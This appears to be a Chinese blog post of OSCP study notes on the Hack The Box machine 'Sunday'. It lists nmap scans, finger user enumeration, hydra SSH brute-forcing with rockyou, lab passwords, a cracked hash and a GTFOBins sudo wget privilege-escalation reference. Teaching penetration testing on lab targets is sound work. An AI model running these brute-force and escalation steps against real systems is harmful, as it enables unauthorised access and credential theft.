OSCP备考_0x10_HackThBox靶机_Linux_Sunday

Ethan医生4个月前 (06-28)靶场114

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)

nmap -sU --top-ports 100 10.129.252.243(扫描UDP)

使用finger进行用户枚举

./finger-user-enum.pl -t 10.129.252.243 -U /usr/share/wordlists/my_list/names.txt -p 79

找到这下面两个有SSH登陆记录那就直接爆破SSH看看

hydra -l sunny -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

密钥是sunday

hydra -l sammy -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

开始登入SSH

先查看history

可以使用john去爆破密码$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB,密钥:cooldude!

john s.hash --wordlist=/usr/share/wordlists/rockyou.txt

sudo -l

https://gtfobins.github.io/gtfobins/wget/#sudo

1281b10cab59bd490d02f489f71abda1

标签: OSCP

返回列表

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.1...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

名称说明靶机下载链接攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

EthanDoctor